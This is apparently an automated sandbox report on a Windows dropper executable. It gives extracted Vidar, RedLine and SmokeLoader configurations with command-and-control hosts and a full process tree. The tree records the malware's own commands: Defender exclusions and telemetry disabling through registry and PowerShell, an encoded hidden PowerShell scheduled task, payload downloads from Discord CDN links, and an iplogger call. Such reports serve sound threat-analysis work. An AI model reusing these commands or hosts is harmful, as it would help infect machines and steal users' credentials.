Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
71s -
max time network
154s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
28/09/2021, 20:22
Static task
static1
Behavioral task
behavioral1
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win10-en-20210920
General
-
Target
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
-
Size
3.9MB
-
MD5
1be0d2741eaac6804e24a7586b1086b0
-
SHA1
cdb330156b2063c6f259cb10a787463756798f7a
-
SHA256
071f6bd61aef9f209be1bfb16ef1fb14bd44804fcab511b129deeb7822948ef9
-
SHA512
cc9352b0ace0a51cac07069adf33d98e548e6726e71bf4582dcb15c3d7b0a7806765ffc57f95511f1aeca798d7fbf44c08bc5ebe7bc13626b8b7bcd0df872f85
Malware Config
Extracted
vidar
40.1
706
https://eduarroma.tumblr.com/
-
profile_id
706
Extracted
redline
pab4
185.215.113.15:61506
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
http://naghenrietti1.top/
http://kimballiett2.top/
http://xadriettany3.top/
http://jebeccallis4.top/
http://nityanneron5.top/
http://umayaniela6.top/
http://lynettaram7.top/
http://sadineyalas8.top/
http://geenaldencia9.top/
http://aradysiusep10.top/
Extracted
redline
7.5k_Z_BOGOM
195.133.18.154:30491
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral2/memory/592-239-0x0000000004AD0000-0x0000000004AEC000-memory.dmp family_redline behavioral2/memory/592-241-0x0000000004C80000-0x0000000004C9A000-memory.dmp family_redline behavioral2/memory/5416-619-0x000000000041C5D2-mapping.dmp family_redline behavioral2/files/0x000400000001ac23-517.dat family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001ac0f-510.dat family_socelars behavioral2/files/0x000400000001ac0f-509.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 4324 created 64 4324 WerFault.exe 86 -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/64-198-0x0000000000400000-0x0000000002403000-memory.dmp family_vidar behavioral2/memory/5020-620-0x0000000000400000-0x00000000008D6000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000500000001abc4-119.dat aspack_v212_v242 behavioral2/files/0x000500000001abc4-121.dat aspack_v212_v242 behavioral2/files/0x000600000001abc3-120.dat aspack_v212_v242 behavioral2/files/0x000600000001abc3-125.dat aspack_v212_v242 behavioral2/files/0x000600000001abc3-126.dat aspack_v212_v242 behavioral2/files/0x000400000001abcb-124.dat aspack_v212_v242 behavioral2/files/0x000400000001abcb-129.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
pid Process 2500 setup_install.exe 592 Thu02588bdad8e7.exe 64 Thu02966ca5c58f270.exe 912 Thu02d385ff55.exe 3936 Thu0247e977c7950492a.exe 1512 Thu0299d0d70a4d322.exe 3684 Thu02483b39590da5492.exe 2644 Thu02f60acc90a3.exe 1552 Thu02c015332704.exe 2844 Thu02bfe1521bcc038.exe 3688 Thu0247e977c7950492a.exe 1004 Riconobbe.exe.com 4140 Riconobbe.exe.com -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Thu02d385ff55.exe -
Loads dropped DLL 7 IoCs
pid Process 2500 setup_install.exe 2500 setup_install.exe 2500 setup_install.exe 2500 setup_install.exe 2500 setup_install.exe 2500 setup_install.exe 2500 setup_install.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000400000001ac15-530.dat themida behavioral2/files/0x000400000001ac26-527.dat themida behavioral2/files/0x000400000001ac19-524.dat themida behavioral2/memory/4932-561-0x0000000000230000-0x0000000000231000-memory.dmp themida behavioral2/files/0x000400000001ac0b-519.dat themida behavioral2/files/0x000400000001ac14-525.dat themida -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Thu02bfe1521bcc038.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Thu02bfe1521bcc038.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 232 ipinfo.io 23 ip-api.com 57 ipinfo.io 58 ipinfo.io 151 ipinfo.io 152 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 8 IoCs
pid pid_target Process procid_target 4324 64 WerFault.exe 86 4504 4892 WerFault.exe 126 912 4892 WerFault.exe 126 4756 4892 WerFault.exe 126 4148 4892 WerFault.exe 126 6520 5012 WerFault.exe 114 7036 4908 WerFault.exe 124 6548 4892 WerFault.exe 126 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu0299d0d70a4d322.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu0299d0d70a4d322.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu0299d0d70a4d322.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6000 schtasks.exe 2896 schtasks.exe 3672 schtasks.exe 380 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 5748 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3320 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1512 Thu0299d0d70a4d322.exe 1512 Thu0299d0d70a4d322.exe 3672 powershell.exe 3672 powershell.exe 3672 powershell.exe 3040 Process not Found 3040 Process not Found 3040 Process not Found 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 3040 Process not Found 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 4324 WerFault.exe 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3040 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1512 Thu0299d0d70a4d322.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 1552 Thu02c015332704.exe Token: SeDebugPrivilege 2644 Thu02f60acc90a3.exe Token: SeDebugPrivilege 3672 powershell.exe Token: SeRestorePrivilege 4324 WerFault.exe Token: SeBackupPrivilege 4324 WerFault.exe Token: SeDebugPrivilege 4324 WerFault.exe Token: SeDebugPrivilege 592 Thu02588bdad8e7.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1004 Riconobbe.exe.com 1004 Riconobbe.exe.com 1004 Riconobbe.exe.com 4140 Riconobbe.exe.com 4140 Riconobbe.exe.com 4140 Riconobbe.exe.com -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1004 Riconobbe.exe.com 1004 Riconobbe.exe.com 1004 Riconobbe.exe.com 4140 Riconobbe.exe.com 4140 Riconobbe.exe.com 4140 Riconobbe.exe.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2176 wrote to memory of 2500 2176 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe 70 PID 2176 wrote to memory of 2500 2176 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe 70 PID 2176 wrote to memory of 2500 2176 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe 70 PID 2500 wrote to memory of 3600 2500 setup_install.exe 73 PID 2500 wrote to memory of 3600 2500 setup_install.exe 73 PID 2500 wrote to memory of 3600 2500 setup_install.exe 73 PID 2500 wrote to memory of 4008 2500 setup_install.exe 74 PID 2500 wrote to memory of 4008 2500 setup_install.exe 74 PID 2500 wrote to memory of 4008 2500 setup_install.exe 74 PID 2500 wrote to memory of 3556 2500 setup_install.exe 76 PID 2500 wrote to memory of 3556 2500 setup_install.exe 76 PID 2500 wrote to memory of 3556 2500 setup_install.exe 76 PID 2500 wrote to memory of 3484 2500 setup_install.exe 75 PID 2500 wrote to memory of 3484 2500 setup_install.exe 75 PID 2500 wrote to memory of 3484 2500 setup_install.exe 75 PID 2500 wrote to memory of 1204 2500 setup_install.exe 77 PID 2500 wrote to memory of 1204 2500 setup_install.exe 77 PID 2500 wrote to memory of 1204 2500 setup_install.exe 77 PID 2500 wrote to memory of 944 2500 setup_install.exe 90 PID 2500 wrote to memory of 944 2500 setup_install.exe 90 PID 2500 wrote to memory of 944 2500 setup_install.exe 90 PID 2500 wrote to memory of 1172 2500 setup_install.exe 89 PID 2500 wrote to memory of 1172 2500 setup_install.exe 89 PID 2500 wrote to memory of 1172 2500 setup_install.exe 89 PID 2500 wrote to memory of 2204 2500 setup_install.exe 78 PID 2500 wrote to memory of 2204 2500 setup_install.exe 78 PID 2500 wrote to memory of 2204 2500 setup_install.exe 78 PID 2500 wrote to memory of 656 2500 setup_install.exe 88 PID 2500 wrote to memory of 656 2500 setup_install.exe 88 PID 2500 wrote to memory of 656 2500 setup_install.exe 88 PID 944 wrote to memory of 592 944 cmd.exe 87 PID 944 wrote to memory of 592 944 cmd.exe 87 PID 944 wrote to memory of 592 944 cmd.exe 87 PID 1172 wrote to memory of 912 1172 cmd.exe 79 PID 1172 wrote to memory of 912 1172 cmd.exe 79 PID 1172 wrote to memory of 912 1172 cmd.exe 79 PID 1204 wrote to memory of 64 1204 cmd.exe 86 PID 1204 wrote to memory of 64 1204 cmd.exe 86 PID 1204 wrote to memory of 64 1204 cmd.exe 86 PID 2500 wrote to memory of 3920 2500 setup_install.exe 80 PID 2500 wrote to memory of 3920 2500 setup_install.exe 80 PID 2500 wrote to memory of 3920 2500 setup_install.exe 80 PID 4008 wrote to memory of 3936 4008 cmd.exe 84 PID 4008 wrote to memory of 3936 4008 cmd.exe 84 PID 4008 wrote to memory of 3936 4008 cmd.exe 84 PID 3556 wrote to memory of 1512 3556 cmd.exe 83 PID 3556 wrote to memory of 1512 3556 cmd.exe 83 PID 3556 wrote to memory of 1512 3556 cmd.exe 83 PID 3600 wrote to memory of 3672 3600 cmd.exe 81 PID 3600 wrote to memory of 3672 3600 cmd.exe 81 PID 3600 wrote to memory of 3672 3600 cmd.exe 81 PID 3484 wrote to memory of 3684 3484 cmd.exe 82 PID 3484 wrote to memory of 3684 3484 cmd.exe 82 PID 2204 wrote to memory of 2644 2204 cmd.exe 85 PID 2204 wrote to memory of 2644 2204 cmd.exe 85 PID 3920 wrote to memory of 1552 3920 cmd.exe 91 PID 3920 wrote to memory of 1552 3920 cmd.exe 91 PID 656 wrote to memory of 2844 656 cmd.exe 92 PID 656 wrote to memory of 2844 656 cmd.exe 92 PID 656 wrote to memory of 2844 656 cmd.exe 92 PID 3936 wrote to memory of 3688 3936 Thu0247e977c7950492a.exe 93 PID 3936 wrote to memory of 3688 3936 Thu0247e977c7950492a.exe 93 PID 3936 wrote to memory of 3688 3936 Thu0247e977c7950492a.exe 93 PID 2844 wrote to memory of 2144 2844 Thu02bfe1521bcc038.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0247e977c7950492a.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu0247e977c7950492a.exeThu0247e977c7950492a.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu0247e977c7950492a.exe"C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu0247e977c7950492a.exe" -a5⤵
- Executes dropped EXE
PID:3688
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02483b39590da5492.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02483b39590da5492.exeThu02483b39590da5492.exe4⤵
- Executes dropped EXE
PID:3684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0299d0d70a4d322.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu0299d0d70a4d322.exeThu0299d0d70a4d322.exe4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02966ca5c58f270.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02966ca5c58f270.exeThu02966ca5c58f270.exe4⤵
- Executes dropped EXE
PID:64 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 9285⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02f60acc90a3.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02f60acc90a3.exeThu02f60acc90a3.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02c015332704.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02c015332704.exeThu02c015332704.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02bfe1521bcc038.exe3⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02bfe1521bcc038.exeThu02bfe1521bcc038.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe5⤵PID:2144
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Del.doc5⤵PID:2032
-
C:\Windows\SysWOW64\cmd.execmd6⤵PID:520
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^NZrkFJTgsCdMvCokxiUUxUBYmGUZCyshQzrAfUxHKQBByATJNifzJsTTnyLZOTMjkrVrmIWmMjlEaZSZNkkcPXDmmpwppcSQtfd$" Una.doc7⤵PID:2392
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.comRiconobbe.exe.com H7⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1004 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com H8⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4140
-
-
-
C:\Windows\SysWOW64\PING.EXEping RSSLLXYN -n 307⤵
- Runs ping.exe
PID:3320
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02d385ff55.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02588bdad8e7.exe3⤵
- Suspicious use of WriteProcessMemory
PID:944
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02d385ff55.exeThu02d385ff55.exe1⤵
- Executes dropped EXE
- Checks computer location settings
PID:912 -
C:\Users\Admin\Documents\dPw5Ib9QBeGmCG91maYltB46.exe"C:\Users\Admin\Documents\dPw5Ib9QBeGmCG91maYltB46.exe"2⤵PID:3924
-
C:\Users\Admin\AppData\Local\Temp\7zSFBB.tmp\Install.exe.\Install.exe3⤵PID:5288
-
C:\Users\Admin\AppData\Local\Temp\7zS2AB6.tmp\Install.exe.\Install.exe /S /site_id "394347"4⤵PID:5812
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵PID:6056
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:5724
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:6504
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:6832
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:5660
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:4872
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:6252
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:6652
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjPdhkgwe" /SC once /ST 12:26:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:3672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjPdhkgwe"5⤵PID:6440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjPdhkgwe"5⤵PID:2212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 20:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\wLVKECk.exe\" uG /site_id 394347 /S" /V1 /F5⤵
- Creates scheduled task(s)
PID:380
-
-
-
-
-
C:\Users\Admin\Documents\q_T1vdWa89TkW6vkpINBYOh4.exe"C:\Users\Admin\Documents\q_T1vdWa89TkW6vkpINBYOh4.exe"2⤵PID:1736
-
-
C:\Users\Admin\Documents\IVNm1qs84EVuVz4XF2WMYEUx.exe"C:\Users\Admin\Documents\IVNm1qs84EVuVz4XF2WMYEUx.exe"2⤵PID:5112
-
-
C:\Users\Admin\Documents\ffLpD3hy57DYkcZoJcBH5VLN.exe"C:\Users\Admin\Documents\ffLpD3hy57DYkcZoJcBH5VLN.exe"2⤵PID:5100
-
-
C:\Users\Admin\Documents\QHcMEYX7gcrHWuCLl93Rs0W4.exe"C:\Users\Admin\Documents\QHcMEYX7gcrHWuCLl93Rs0W4.exe"2⤵PID:5080
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:4196
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵PID:5736
-
-
-
-
C:\Users\Admin\Documents\CCGhcmaCaXBJqIg11rIVG8UJ.exe"C:\Users\Admin\Documents\CCGhcmaCaXBJqIg11rIVG8UJ.exe"2⤵PID:5068
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\12BB.bat C:\Users\Admin\Documents\CCGhcmaCaXBJqIg11rIVG8UJ.exe"3⤵PID:5000
-
C:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/890550701829259356/exe.exe" "exe.exe" "" "" "" "" "" ""4⤵PID:4660
-
-
C:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/892465432404054046/1.exe" "1.exe" "" "" "" "" "" ""4⤵PID:5300
-
-
-
-
C:\Users\Admin\Documents\c2XgxFbhS2CcPAJ9s3xNcd2Z.exe"C:\Users\Admin\Documents\c2XgxFbhS2CcPAJ9s3xNcd2Z.exe"2⤵PID:5056
-
C:\Users\Admin\Documents\c2XgxFbhS2CcPAJ9s3xNcd2Z.exeC:\Users\Admin\Documents\c2XgxFbhS2CcPAJ9s3xNcd2Z.exe3⤵PID:5492
-
-
-
C:\Users\Admin\Documents\90ZS7lblTU0b8CDGokcX3kbU.exe"C:\Users\Admin\Documents\90ZS7lblTU0b8CDGokcX3kbU.exe"2⤵PID:5040
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "269new.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"3⤵PID:4100
-
C:\Users\Admin\AppData\Local\Temp\269new.exe"269new.exe"4⤵PID:5636
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"4⤵PID:5828
-
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"4⤵PID:5520
-
-
-
-
C:\Users\Admin\Documents\LaTj_UCNH_apS0BWR011jP3L.exe"C:\Users\Admin\Documents\LaTj_UCNH_apS0BWR011jP3L.exe"2⤵PID:5036
-
-
C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"2⤵PID:5012
-
C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:4420
-
C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\AdvancedRun.exe" /SpecialRun 4101d8 44204⤵PID:5152
-
-
-
C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"3⤵PID:6364
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe" -Force3⤵PID:6352
-
-
C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"3⤵PID:6408
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 19083⤵
- Program crash
PID:6520
-
-
-
C:\Users\Admin\Documents\POJjnd4yX1QdC2tGCPMDcWFA.exe"C:\Users\Admin\Documents\POJjnd4yX1QdC2tGCPMDcWFA.exe"2⤵PID:5020
-
-
C:\Users\Admin\Documents\a2ExsgEJPCo87mIa1w5x3NKN.exe"C:\Users\Admin\Documents\a2ExsgEJPCo87mIa1w5x3NKN.exe"2⤵PID:4992
-
-
C:\Users\Admin\Documents\D7MRfhIYj4MqyU6a9zH1sISE.exe"C:\Users\Admin\Documents\D7MRfhIYj4MqyU6a9zH1sISE.exe"2⤵PID:4980
-
-
C:\Users\Admin\Documents\6DlWRP2zRqgVktoNNTFSEnau.exe"C:\Users\Admin\Documents\6DlWRP2zRqgVktoNNTFSEnau.exe"2⤵PID:4988
-
-
C:\Users\Admin\Documents\TyuSPUqMot9veNWUIsEz10ia.exe"C:\Users\Admin\Documents\TyuSPUqMot9veNWUIsEz10ia.exe"2⤵PID:4972
-
-
C:\Users\Admin\Documents\LwGxRY1eqoJqUMNgYvETJBM_.exe"C:\Users\Admin\Documents\LwGxRY1eqoJqUMNgYvETJBM_.exe"2⤵PID:4960
-
-
